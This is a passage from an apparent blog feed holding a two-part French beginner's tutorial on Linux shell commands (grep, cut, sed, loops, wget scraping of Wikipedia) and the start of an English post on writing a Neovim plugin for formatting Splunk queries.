Cependant, il existe une commande magique qui permet d'interrompre le processus en cours : <code>CTRL+C</code>. Il vous suffira d'appuyer sur la touche "contrôle" en même temps que "c" et le processus en cours sera interrompu immédiatement. On stoppe, on corrige et on recommence !</p> <h2> Cut </h2> <p>Dans l'article précédent, nous avons pu voir comment gérer des listes à colonne unique avec <code>grep</code>. Maintenant qu'en est-il des cas où les lignes sont un peu plus denses d'informations ?</p> <p>Il existe un outil simple : <code>cut</code> qui nous permettra de régler une grande partie de nos soucis.</p> <p>Prenons un format comme le <a href="https://fr.wikipedia.org/wiki/Comma-separated_values">csv</a> et l'exemple suivant:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Robert;Dupont;rue du Verger, 12; "Michel";"Durand";" av. de la Ferme, 89 "; "Michel ""Michele""";"Durand";" av. de la Ferme, 89"; "Michel;Michele";"Durand";"av. de la Ferme, 89"; </code></pre> </div> <p>Sauvons le directement dans un fichier avec la commande suivante :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'Robert;Dupont;rue du Verger, 12; "Michel";"Durand";" av. de la Ferme, 89 "; "Michel ""Michele""";"Durand";" av. de la Ferme, 89"; "Michel;Michele";"Durand";"av. de la Ferme, 89"; '</span> <span class="o">&gt;</span> exemple.csv </code></pre> </div> <p><code>echo</code> renvoie l'information que vous lui donner à l'instar d'un écho. Donc ici, <code>echo</code> enverra les informations que nous avons copiées et collées depuis la page Wikipédia. Ensuite le chevron simple (<code>&gt;</code>) créera et remplira un nouveau fichier <code>exemple.csv</code> avec les informations que nous lui envoyons.</p> <blockquote> <p>Astuce : le copier coller dans le terminal fonctionne dès fois différemment en fonction des configurations. Vous pouvez coller en appuyant sur la touche majuscule en même temps que "contrôle" et "v" ou bien, en faisant clic droit et en choisissant l'option "coller".</p> </blockquote> <p>Vérifions que le fichier n'est pas vide avec <code>cat exemple.csv</code>. Si tout va bien, les informations que nous avons collées s'y trouvent.</p> <p><code>cut</code> fonctionne avec deux options principales : <code>-d</code> pour définir le délimiteur et <code>-f</code> pour choisir la colonne que vous voulez récupérer.</p> <p>Pour un premier essai, essayons : <code>cut -d " " -f 1</code>. Ici nous définissions une espace comme délimiteur et prenons le premier résultat après ce délimiteur.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>exemple.csv | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">" "</span> <span class="nt">-f</span> 1 </code></pre> </div> <p>Donne comme résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Robert;Dupont;rue "Michel";"Durand";" "Michel "Michel;Michele";"Durand";"av. </code></pre> </div> <p>Tout s'est bien passé ! Ce sont tous les premiers résultats de la première colonne avant une espace.</p> <blockquote> <p>Expérimentez avec d'autres délimiteurs comme ";", "," ou "." et d'autre choix de colonnes (vous pouvez sélectionner plusieurs colonnes comme ceci : <code>-f 1,2</code>), qu'observez-vous ?</p> </blockquote> <h2> Sed </h2> <p>Il est possible que vous ayez à modifier les données de votre colonne. Travailler avec les données, c'est souvent un peu de code et beaucoup de nettoyage. <code>sed</code> est une commande qui va vous permettre à remplacer des caractères selon une condition. En gros, c'est comme le chercher remplacer de n'importe quel éditeur de texte mais ici, il sera possible de l’enchaîner à notre processus.</p> <p>La syntaxe de <code>sed</code> fonctionne ainsi : <code>sed mode/texte à changer/comment le texte doit être changé/option fichier</code>. Donc pour notre objectif : <code>sed 's/;/ /g'</code>. Ici nous utilisons le mode <code>s</code> qui signifie substitution ; nous remplaçons les ";" par des espaces et nous utilisons l'option <code>g</code> ce qui signifie "global" ; c'est-à-dire que nous appliquons cette condition à toutes les occurrences du fichier (<strong>précision</strong>: à toutes les occurrences de la ligne).</p> <p>Commençons par récupérer les informations depuis notre csv :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>exemple.csv | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">" "</span> <span class="nt">-f</span> 1 </code></pre> </div> <p>Et remplaçons les ";" par une espace :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>exemple.csv | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">" "</span> <span class="nt">-f</span> 1 | <span class="nb">sed</span> <span class="s1">'s/;/ /g'</span> </code></pre> </div> <p>Résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Robert Dupont rue "Michel" "Durand" " "Michel "Michel Michele" "Durand" "av. </code></pre> </div> <p>Et voilà ! Rechercher, filtrer, remplacer !</p> <blockquote> <p>Ici, nous utilisons <code>sed</code> enchaîné avec d'autres processus, si vous désirer l'utiliser seul avec un seul fichier, il faudra utiliser l'option <code>-i</code>. Exemple: <code>sed s/brusselles/Bruxelles/g fichier -i</code>. Cet exemple remplacera toutes les occurrences de "brusselles" dans le fichier "fichier" par son orthographe correcte : "Bruxelles".</p> </blockquote> <p><strong>Précision</strong>: l'option <code>-i</code> est utilisée pour sauvegarder la modification dans le même fichier, il est aussi possible de rediriger le résultat vers un autre fichier.</p> <h2> Variables </h2> <p>En programmation, les variables sont des emplacements dans lesquels on peut enregistrer des informations. Par défaut, le terminal Linux utilise un langage que l'on appelle Bash ou parfois appelé shell script.</p> <p>Grâce à celui-ci, nous pouvons enregistrer des informations dans des variables et les réutiliser.</p> <p>Pour définir une variable, choisissez un nom, ici "nombre_deux" et une valeur, ici "2". Assigner une valeur à une variable se fait via le signe "=" : <code>nombre_deux=2</code> et puis appuyez sur Entrée. Ensuite pour l'appeler, il faudra toujours précéder la variable par le symbole <code>$</code>. Exemple : <code>echo $variable_deux</code> et votre terminal devra vous répondre "2".</p> <p>Exemple complet:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">nombre_deux</span><span class="o">=</span>2 <span class="nb">echo</span> <span class="nv">$nombre_deux</span> </code></pre> </div> <p>Il est aussi possible de réassigner une variable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">nombre_deux</span><span class="o">=</span>3 <span class="nb">echo</span> <span class="nv">$nombre_deux</span> </code></pre> </div> <p>Le résultat ici devra être "3".</p> <h2> Boucles </h2> <p>Voici un autre concept de programmation : les boucles. Les boucles permettent à un programme d'être exécuté en répétition jusqu'à arriver à une certain condition. La syntaxe de base sera comme suit :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">for </span>VARIABLE <span class="k">in </span>LISTE<span class="p">;</span> <span class="k">do </span>ACTION <span class="nv">$VARIABLE</span><span class="p">;</span> <span class="k">done</span> </code></pre> </div> <p>Pour lire ça en français, ça sera : "pour la variable "VARIABLE" dans la liste "LISTE", faire l'action "ACTION" et, quand il n'y a plus de variable dans la liste, terminer la boucle ("done" - réalisé, en français). Vous remarquerez que la variable est appelée avec le symbole "$" comme nous avons vu plus haut et que chaque instruction est séparée par un ";".</p> <blockquote> <p>Vous ne devez pas nécessairement écrire les variables en capitales, je le fais juste pour différencier ce qui tient de la syntaxe de la fonction et ce que vous pouvez changer.</p> </blockquote> <p>Essayons d'imprimer toutes les lignes de notre csv :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">for </span>ligne <span class="k">in</span> <span class="si">$(</span><span class="nb">cat </span>exemple.csv<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="nv">$ligne</span><span class="p">;</span> <span class="k">done</span> </code></pre> </div> <blockquote> <p>Qu'est-ce <code>$(cat exemple.csv)</code> ? En utilisant <code>$()</code>, nous pouvons exécuter une autre fonction Bash à l'intérieur d'une fonction, un peu comme des poupées russes. Donc en faisant <code>cat exemple.csv</code>, nous avons imprimé le csv dans le terminal et ensuite commencé la boucle.</p> </blockquote> <p>Devra donner ce résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Robert;Dupont;rue du Verger, 12;… "Michel";"Durand";" av. de la Ferme, 89 ";… "Michel ""Michele""";"Durand";" av. de la Ferme, 89";… "Michel;Michele";"Durand";"av. de la Ferme, 89";… </code></pre> </div> <blockquote> <p>Assez intéressant que le système coupe les lignes aux espaces...</p> </blockquote> <p>Il est aussi possible de faire des boucles plus proches de ce qu'on retrouve dans les cours de maths, comme par exemple: "somme de tout n, partant de 0 jusque 100". En Bash (donc dans notre terminal), il sera possible de faire ça de la manière suivante (et en une ligne) :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">somme</span><span class="o">=</span>0<span class="p">;</span> <span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>0 100<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nv">somme</span><span class="o">=</span><span class="si">$(</span><span class="nb">expr</span> <span class="nv">$somme</span> + <span class="nv">$i</span><span class="si">)</span><span class="p">;</span> <span class="k">done</span><span class="p">;</span> <span class="nb">echo</span> <span class="nv">$somme</span> </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ThKHWi-d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/iyxjzigb4wyr3an7looa.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ThKHWi-d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/iyxjzigb4wyr3an7looa.gif" alt="Alt Text"></a></p> <p>Ok, perdu.e.s ? La première fois, moi aussi. Revenons dessus pas à pas :</p> <ul> <li> <code>somme=0</code> : nous définissons une variable "somme" et l'initialisons à 0</li> <li> <code>;</code> : ce caractère nous permet de séparer différentes instructions en Bash. C'est-à-dire que nous disons à notre terminal de suivre la première instruction avec la suivante. Cela diffère de la barre verticale <code>|</code> où les deux instructions sont connectées.</li> <li> <code>for VARIABLE in CONDITION; do ACTION SUR VARIABLE; done</code> : ceci est la syntaxe de base d'une boucle en Bash.</li> <li> <code>$(seq 0 100)</code> : <code>seq 0 100</code> est une instruction affichera les chiffres de 0 à 100 dans votre terminal (essayez !).</li> <li> <code>expr $somme + $i</code> : pour que votre terminal comprenne que vous voulez faire une expression arithmétique, il faudra ajouter la fonction <code>expr</code>. Ensuite, appeler les deux variables <code>somme</code> et <code>i</code> (que nous avons définies au début de notre boucle) avec <code>$</code>. Cette fonction fera la somme de <code>$somme</code> ainsi que de <code>$i</code> et enregistra le résultat dans la variable <code>somme</code>.</li> <li> <code>done</code> : permet de finir la boucle ouverte via <code>for</code> </li> <li> <code>echo $somme</code>: va afficher le résultat final de notre boucle.</li> </ul> <p>Félicitations, vous venez de faire votre première boucle !</p> <blockquote> <p><strong>Précisions</strong>: Pour <code>seq</code>, il est aussi possible de faire <code>{1..100}</code> et arriver au même résultat. Pour <code>expr</code>, il es aussi possible de faire <code>$((1 + 1))</code>.</p> </blockquote> <h2> Cas pratique : Fouiller une page web </h2> <p>Faire des additions, c'est utile mais nous avons tou.te.es des calculettes dans nos poches et franchement, on s'en fiche un peu de faire ça via le terminal.</p> <p>Alors, voici un cas pratique qui va reprendre l'entièreté de la matière cet article et du précédent dans quelque chose d'utile : récupérer des informations d'une page web.</p> <blockquote> <p>Ici, nous allons utiliser la plupart de concepts vus dans les deux premiers articles, s'il y a des parties que vous trouvez compliquées ou peu claires, n'hésitez pas à revenir sur vos pas. Le but n'est pas de tout comprendre d'un coup tout de suite mais d'intégrer les concepts à son aise.</p> </blockquote> <p>D'abord, prenons cette page web : <a href="https://fr.wikipedia.org/wiki/Hedy_Lamarr">https://fr.wikipedia.org/wiki/Hedy_Lamarr</a>.</p> <p>Téléchargeons la via <code>wget</code> :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>wget https://en.wikipedia.org/wiki/Hedy_Lamarr <span class="nt">-O</span> page.html </code></pre> </div> <blockquote> <p>L'option de destination du fichier est un "o" majuscule pas un zéro !</p> </blockquote> <p>Vérifions la page :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">head </span>page.html </code></pre> </div> <p>En HTML, le langage de formatage des pages web, le liens sont précédés de la balise <code>href=</code> :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"href="</span> page.html </code></pre> </div> <p>Choisissons maintenant un délimiteur :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cut -d '"' -f 1 </code></pre> </div> <blockquote> <p>Il est possible de faire passer plusieurs <code>cut</code> l'un à la suite de l'autre afin de filtrer au maximum le résultat de la page. En effet, le travail de filtrage de pages web peut être un peu laborieux au début afin de trouver les bons filtres. C'est important de tester différentes choses et de regarder le résultat et d'incrémenter progressivement la précision des-dits filtres.</p> </blockquote> <p>Ici, nous allons récupérer tous les liens internes de la page Wikipédia, c'est-à-dire les liens qui commencent par <code>/wiki/</code>. Nous allons utiliser l'option <code>-e</code> de <code>grep</code> qui nous permettra de faire passer un filtre spécial (une expression régulière ou <em>regex</em>).</p> <blockquote> <p>Les <a href="https://fr.wikipedia.org/wiki/Expression_r%C3%A9guli%C3%A8re"><em>regex</em></a> sont une langage de programmation qui permet de faire du filtrage plus précis de texte. Ce n'est pas le sujet de cet article car c'est assez abscon au début. Retenez ici jusque le "^" défini le début d'une chaine de caractère. Donc, dans l'exemple suivant <code>^/wiki/</code> signifie : toutes les lignes qui commencent exclusivement par "/wiki/".<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"href="</span> page.html | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s1">'"'</span> <span class="nt">-f</span> 2 | <span class="nb">grep</span> <span class="nt">-e</span> <span class="s2">"^/wiki/"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> liens.txt </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--D5x_9IBV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6slvou22f5j0h4zrvqp9.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--D5x_9IBV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6slvou22f5j0h4zrvqp9.gif" alt="Alt Text"></a></p> <p>Vous remarquerez que les liens ne sont pas complets, c'est pour cela que nous allons corriger cela avec <code>sed</code> et l'option <code>-i</code> :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sed</span> <span class="s1">'s/\/wiki\//https:\/\/fr\.wikipedia\.org\/wiki\//g'</span> liens.txt <span class="nt">-i</span> </code></pre> </div> <blockquote> <p>Pourquoi des <code>\</code> devant les caractères spéciaux ? Car <code>sed</code> fonctionne avec des <em>regex</em> et chaque caractère à une signification et une fonction particulière. Nous voulons considérer ces caractères de façon littérale, donc nous devons <em>les échapper</em> avec le caractère <code>\</code>. C'est-à-dire, dire à <code>sed</code> qu'il ne faut pas les considérer comme des fonctions mais comme de simples caractères. C'est le cas pour les <code>/</code> et <code>.</code>. Si vous regardez bien, les <code>/</code> qui se sont pas échappés, ce sont ceux qui sont nécessaires pour la syntaxe de <code>sed</code>.<br> <strong>Astuce</strong> : Il est aussi possible d'utiliser <code>#</code> lorsqu'il y a beaucoup de caractères à échapper. Donc, ceci est valide aussi et donnera le même résultat : <code>sed 's#/wiki//#https://fr.wikipedia/.org/wiki/#' liens.txt -i</code> (et est un peu plus facile à lire).</p> </blockquote> <p>Vérifions notre liste de liens :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">head </span>liens.txt </code></pre> </div> <p>Maintenant, nous allons télécharger tous les liens les uns à la suite de l'autre pour une lecture hors-ligne confortable.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir </span>dossier_liens <span class="k">for </span>lien <span class="k">in</span> <span class="si">$(</span><span class="nb">cat </span>liens.txt<span class="si">)</span><span class="p">;</span> <span class="k">do </span>wget <span class="nv">$lien</span> <span class="nt">-P</span> dossier_liens<span class="p">;</span> <span class="k">done</span> </code></pre> </div> <blockquote> <p>L'option <code>-P</code> permet d'envoyer le résultat de <code>wget</code> dans un dossier plutôt que dans un fichier.</p> </blockquote> <p>Et voilà le travail !</p> <blockquote> <p>Il est possible de faire tout cela en une seule ligne. Les fameux "one-liners" dont les développeur.euse.s raffolent tant. Essayer de trouver une manière de faire ces commandes en une seule ligne et lancez-la ! Essayez d'arriver au même résultat avec différentes pages Wikipédia.</p> </blockquote> <h1> Conclusion </h1> <p>Nous avons vu dans ces deux articles comment traiter des listes, les filtrer, les nettoyer et en refaire des objets que nous pouvons utiliser par la suite !</p> <p>N'hésitez pas à me contacter si vous avez des questions ou des remarques.</p> <p><strong>Edit</strong> : Merci à Dattaz pour les précisions et les astuces !</p> beginners linux french chris Thu, 07 Jan 2021 17:39:04 +0000 https://dev.to/evilcel3ri/la-ligne-de-commande-linux-pour-les-impatient-e-s-49ne https://dev.to/evilcel3ri/la-ligne-de-commande-linux-pour-les-impatient-e-s-49ne <p>La ligne de commande Linux est un outil incroyable, elle permet d'avoir un interaction directe avec son ordinateur et propose un certain nombre de fonctionnalités qui augmentent assez vite la productivité.</p> <p>Seulement, elle n'est pas nécessairement facile à prendre en main. Par défaut, vous vous retrouvez devant une fenêtre noire avec un curseur qui clignote un peu en mode années 80 ; ce n'est pas très rassurant !</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--T4ee7NBC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/bppol621kbrimnr2n4mn.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--T4ee7NBC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/bppol621kbrimnr2n4mn.png" alt="Alt Text"></a></p> <p>Pourtant, il n'y a rien à craindre. Ce que vous voyez, c'est un <em>terminal</em> et nous allons écrire des commandes qui seront des instructions comprises par votre ordinateur. Si vous écrivez correctement les choses, votre ordinateur exécutera vos souhaits, autrement, il affichera une erreur.</p> <blockquote> <p>Faites attention, il est possible de faire des bêtises via la ligne de commande. Soyez attentif.ve.s à ce que vous écrivez et tentez de toujours comprendre ce que vous tapez sur votre clavier</p> </blockquote> <h1> Les mouvements de base </h1> <p>L'intérieur de votre machine Linux fonctionne comme un arbre. Il a sa racine ("root" en anglais) et s'ouvre en myriades de branches qui ont toutes un chemin ("path" en anglais) standardisé.</p> <p>La première chose à faire, c'est se localiser, pour cela, il y a une commande: <code>pwd</code> ("print working directory" - afficher le dossier courant).</p> <p>Écrivez ces trois lettres dans votre terminal et appuyez sur Entrée. Vous devrez avoir un résultat comme: <code>/home/chris</code> (remplacez "chris" par votre nom d'utilisateur.ice). Ceci est votre maison ("home") ou dossier utilisateur.ice.</p> <p>Maintenant, bougeons ! Pour se déplacer dans l'arbre, retenez la commande <code>cd</code> ("change directory" - changer de dossier). Il faudra ajouter un instruction à cette commande pour que votre ordinateur comprenne où vous décidez de vous rendre. Linux contient par défaut quelques raccourcis:</p> <ul> <li> <code>/</code>: root, la racine de votre arbre à dossiers</li> <li> <code>~</code>: home, votre dossier utilisateur.ice</li> <li> <code>..</code>: dossier parent</li> <li> <code>.</code>: dossier courant</li> </ul> <blockquote> <p>Entrez <code>cd /</code>, appuyez sur entrée et ensuite <code>pwd</code>. Vous remarquerez que vous avez changé d'emplacement.</p> </blockquote> <p>Il est aussi possible de bouger de dossier parent à dossier parent avec : <code>cd ../../</code>.</p> <p>Que représentent ces <code>/</code> ? Ils sont les séparations entre les dossiers de votre arbre à dossier. Vous commencez par <code>/</code> et ensuite ajoutez un dossier, par exemple <code>/home</code> et ensuite encore un sous dossier: <code>/home/chris</code>. Et comme cela jusqu'à vous arriverez à votre destination souhaitée.</p> <blockquote> <p>Maintenant pour afficher le contenu des dossiers: <code>ls</code> ("list" - lister). Essayez: <code>cd /</code> appuyez sur Entrée et puis <code>ls</code> et appuyez sur Entrée. Répétez cela avec <code>cd ~</code> et puis <code>ls</code> et comparez les résultats.</p> </blockquote> <h1> Création de fichiers et de dossiers </h1> <p>Maintenant que vous savez vous déplacer, attaquons-nous à la création de dossiers.</p> <p>Pour créer un fichier, nous utiliserons la commande <code>touch</code> ("toucher" en anglais) suivi du nom de fichier que nous voulons créer. Exemple : <code>touch test</code>.</p> <blockquote> <p>Si vous avez un soucis à ce niveau, faites: <code>cd ~</code> et puis réessayez.</p> </blockquote> <p>Pour créer un dossier, nous utiliserons la commande <code>mkdir</code> ("make directory" - créer un dossier) suivi du nom de dossier que nous voulons créer. Exemple : <code>mkdir dossier_test</code>.</p> <p>Maintenant, si vous faites <code>ls</code>, vous devrez trouver le fichier et le dossier créés.</p> <p>Nous pouvons déplacer le fichier dans le dossier avec la commande <code>mv</code> ("move" - bouger en anglais) suivi de l'objet que nous voulons bouger suivi de la destination. Exemple: <code>mv test dossier_test</code></p> <blockquote> <p>Trop de fautes de frappes ? Pas assez de patience ? Les terminaux Linux ont une touche magique: <code>Tab</code>. Si vous appuyez dessus, il vous proposera des fichiers ou dossier présents dans le chemin courant où vous vous trouvez. Essayez et n'hésitez pas à appuyer plusieurs fois !</p> </blockquote> <p>Nous pouvons aussi copier des objets grâce à la commande <code>cp</code> ("copy" - copier) suivi de l'objet et de la destination. Exemple: <code>cp dossier_test/test test2</code>.</p> <p>Il est aussi possible d'effacer des fichiers avec la commande <code>rm</code> ("remove" - enlever). <strong>Mais faites attention, les fichiers effacés ne sont pas récupérables dans la corbeille, ils sont partis pour de bon !</strong></p> <blockquote> <p>Astuce : pour renommer un fichier ou un dossier, il vous suffira de bouger (<code>mv</code>) un fichier ou dossier vers son nouveau nom. Exemple: <code>mv dossier_test dossier_final</code>.</p> </blockquote> <h1> Que les choses sérieuses commencent ! </h1> <p>Maintenant, vous avez une connaissance de base des mouvements grâce à la ligne de commande Linux. Nous allons plonger dans des utilités plus efficaces grâce à la ligne de commande, notamment le traitement de grands et lourds fichiers texte.</p> <p>Lorsque les éditeurs de texte peuvent être lourds et lents à réagir, utiliser la ligne de commande vous permettra de trouver ce que vous chercher plus rapidement.</p> <p><em>Afficher un fichier</em>:</p> <ul> <li> <code>cat</code>: affiche le fichier. N'affiche rien si le fichier est vide. Exemple : <code>cat test2</code>.</li> <li> <code>head</code>: affiche les premières lignes du fichier. N'affiche rien si le fichier est vide. Exemple : <code>head fichier</code> </li> <li> <code>tail</code>: affiche les dernières lignes du fichier. N'affiche rien si le fichier est vide. Exemple: <code>tail fichier</code> </li> </ul> <p><em>Chercher un fichier</em>:</p> <p>Pour chercher un fichier, nous utilisons une commande qui s'appelle <code>grep</code>. Qui nous permettra de fouiller le texte d'un fichier d'en extraire les résultats.</p> <p>Prenons d'abord un gros texte, par exemple un version texte de <em>Frankenstein</em> de Mary Shelley (c'est dans le domaine public de nous en faites pas vous ne faites rien d'illégal). Téléchargez le avec cette commande:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>wget https://archive.org/stream/Frankenstein1818Edition/frank-a5_djvu.txt <span class="nt">-O</span> texte_complet.txt </code></pre> </div> <blockquote> <p><code>wget</code> est une commande qui vous permet de télécharger une page web.</p> </blockquote> <p>Attendez quelques secondes, puis vérifiez que le texte (<code>texte_complet.txt</code>) est présent en utilisant <code>ls</code>.</p> <p>Pour chercher le texte, vous devrez définir le mot que vous recherchez ainsi que l'endroit où vous voulez le chercher. Ici:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"love"</span> texte_complet.txt </code></pre> </div> <p>Cette commande va rechercher le mot "love" ("amour") dans le texte de <em>Frankenstein</em>. Vous remarquerez que grep trouve aussi des mots comme "beloved" ou "lovely" qui ne sont pas nécessairement ce que nous voulons. Rajoutons des espaces autour de notre cible:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">" love "</span> texte_complet.txt </code></pre> </div> <p>Ici, <code>grep</code> va rechercher toutes les occurrences de "love" mais entre deux espaces.</p> <p>Il est possible de compter le nombre de résultats. Pour cela, nous allons introduire un nouveau concept: <code>|</code>.</p> <p>La barre verticale ou "pipe" en anglais va permettre de transférer le résultat d'une commande vers une autre commande.</p> <p>Nous allons envoyer le résultat de notre rechercher dans la commande <code>wc</code> ("word count" - compte de mots) qui va compter le nombre de résultats:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">" love "</span> texte_complet.txt | <span class="nb">wc</span> <span class="nt">-w</span> </code></pre> </div> <blockquote> <p><code>-w</code> est une option de la commande <code>wc</code> qui affiche le nombre de mots. Ces options sont disponibles pour chaque commandes, vous pouvez les explorer avec l'option <code>--help</code>. Par exemple : <code>ls --help</code>.</p> </blockquote> <p>Ok, tout cela est bien joli mais nous pouvons faire plus !</p> <p>Prenons, la liste des 10 000 mots de passe les plus communs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt <span class="nt">-O</span> liste_mdp.txt </code></pre> </div> <p>Pour compter le nombre de ligne du fichier: <code>wc -l liste_mdp.txt</code>. Si tout va bien, vous verrez 10 000.</p> <p>Maintenant cherchons le mot "pass" dans cette liste : <code>grep "pass" liste_mdp.txt</code>. Il y a plus de résultats que nous pouvons compter, comptons:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"pass"</span> liste_mdp.txt | <span class="nb">wc</span> <span class="nt">-l</span> </code></pre> </div> <p>Est-ce possible que nous ayons des doublons ? Peu probable, mais testons cela grâce à la commande <code>sort</code> ("trier" en anglais):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"pass"</span> liste_mdp.txt | <span class="nb">sort</span> <span class="nt">-u</span> | <span class="nb">wc</span> <span class="nt">-l</span> </code></pre> </div> <blockquote> <p>Pourquoi mettons <code>sort</code> avant <code>wc</code> ? Parce que nous voulons compter le nombre de mots après qu'ils soit triés.</p> </blockquote> <p>La dernière étape de ce tutoriel, sera de sauvegarder le résultat de notre recherche dans un fichier. Pour cela nous utiliserons les chevrons: <code>&gt;</code> et <code>&gt;&gt;</code>.</p> <p>Ces deux caractères nous permettent, comme la barre verticale, de rediriger le résultat d'une fonction mais cette fois-ci afin de l'écrire dans un fichier.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"pass"</span> liste_mdp.txt | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> resultat.txt </code></pre> </div> <blockquote> <p>La différence entre <code>&gt;</code> et <code>&gt;&gt;</code>, c'est que <code>&gt;</code> récriera votre fichier tandis que <code>&gt;&gt;</code> ajoutera le résultat à la fin du fichier ("append" en anglais). Donc si vous rajoutez des informations, utilisez plutôt <code>&gt;&gt;</code> au risque de perdre vos recherches précédentes.</p> </blockquote> <p>Maintenant vous pouvez faire: <code>cat resultat.txt</code> et vous verrez le résultat de votre recherche !</p> <h1> Pourquoi est-ce utile ? </h1> <p>Je suis bien conscient que ces quelques exemples peuvent paraître un peu abscons lorsqu'on débute. Pourtant ce genre de recherches est très courantes lorsque vous travaillez avec de volumineux fichiers comme les données de connexion sur un serveur ou bien d'importantes listes.</p> <p>Maintenant vous savez :</p> <ul> <li>naviguer dans l'arbre à fichier</li> <li>afficher le contenu d'un fichier et d'un dossier</li> <li>créer, copier, effacer des fichiers et des dossiers</li> <li>télécharger des pages web</li> <li>chercher des occurrences, les compter, les trier et les sauver</li> </ul> <p><strong>EDIT</strong>:</p> <p>Voici quelques astuces en plus proposées par dattaz sur <a href="https://twitter.com/dat_taz/status/1347241284533182466">Twitter</a>.</p> <ul> <li> <code>cd -</code> : retour au dossier précédent</li> <li> <code>man</code> : pour avoir le documentation des options des commandes. Example: <code>man cd</code>.</li> <li> <code>grep</code> peut compter directement les lignes avec l'option -c. Example: <code>grep -c " love " texte_complet.txt</code>.</li> </ul> <p>Autre astuce <code>grep</code> l'option <code>-v</code> qui permet d'afficher toutes les lignes qui n'ont PAS le mot.</p> <p>Ainsi qu'une précision : <code>sort</code> utilisé sans options va seulement trier votre liste par ordre alphabétique. C'est l'option <code>-u</code> qui vous permettra de trier ainsi que d'enlever les doublons.</p> beginners tutorial linux french chris Tue, 15 Dec 2020 22:41:55 +0000 https://dev.to/evilcel3ri/how-i-wrote-my-first-neovim-plugin-357h https://dev.to/evilcel3ri/how-i-wrote-my-first-neovim-plugin-357h <p>I am a big user of Vim and Neovim. I probably don't know all the bindings and all the magic inside, but I use it daily and it has become one of my favorite app.</p> <p>In previous articles (<a href="https://dev.to/christalib/i-spent-3-years-configuring-n-vim-and-this-what-i-learnt-22on">here</a> and <a href="https://dev.to/christalib/n-vim-shortcuts-for-the-lazy-2pll">here</a>), I've already went through some plugins I (used) to use and some configuration tips.</p> <p>But today, we are going to take one step further: writing a plugin!</p> <h2> The pain </h2> <p>We use <a href="https://www.splunk.com/en_us" rel="noopener noreferrer">Splunk</a> at work a data-driven cloud app which has its own query language. Writing queries for Splunk can get cumbersome especially when they are starting to become larger and larger and you get lost in the amount of parenthesizes. </p> <p>The solution I found was to write a small python script that would indent and separate the different blocks allowing a more convenient way to read the queries. </p> 